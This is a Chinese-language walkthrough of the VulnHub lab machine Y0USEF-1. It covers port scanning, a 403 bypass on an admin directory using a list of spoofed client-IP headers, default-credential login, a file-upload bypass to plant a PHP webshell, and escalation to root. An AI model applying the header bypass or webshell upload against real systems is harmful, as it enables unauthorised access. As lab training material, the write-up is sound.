考点:403绕过,上传绕过
靶机链接:https://www.vulnhub.com/entry/y0usef-1,624/
环境配置
名称 | IP |
---|
Kali Linux | 10.0.2.24 |
Y0USEF-1 | 10.0.2.29 |
初步打点
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| $ export rip=10.0.2.29
$ sudo nmap -v -A -p- $rip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
| 2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
| 256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
|_ 256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Ubuntu)
|
WEB测试
看来要在web突破
dirsearch
1
| $ dirsearch -u http://10.0.2.29
|
发现了administration 目录,请求返回403
使用X-Forwarded-For绕过了
1
2
3
4
5
6
7
| X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
|
data:image/s3,"s3://crabby-images/545cf/545cf36d154dd63d46be0aa1612c277f81225716" alt="1"
漏洞发现
使用admin admin登录后,发现上传,上传文本失败,上传图片成功,这里上传php文件,继续绕过获得webshell
data:image/s3,"s3://crabby-images/b9618/b9618941c9640b6efc891d3d66a7ccb8db8f52c4" alt="2"
获得权限
连接antsword
data:image/s3,"s3://crabby-images/bd7c0/bd7c0dcb5c366b419e793938de1a231c6e07de5d" alt="3"
使用antsword连接
data:image/s3,"s3://crabby-images/12ee1/12ee179309750266c670d1f8e5818b77ffe0aeb7" alt="4"
在/home目录发现文件
data:image/s3,"s3://crabby-images/3a626/3a6265fdc68b30a3213222b3720be53b821882e5" alt="4"
base64解码后
data:image/s3,"s3://crabby-images/cccc5/cccc53a727a895a729642321ec56a47b83026758" alt="5"
提权
使用获得的用户名密码登录
data:image/s3,"s3://crabby-images/62f85/62f85a99e2c08141a089578717c7479e179339ea" alt="6"
登录成功后发现可以直接root
data:image/s3,"s3://crabby-images/a22b8/a22b8917065f22bb7684aea5c077531d66a6908f" alt="7"
最后修改于 2020-12-10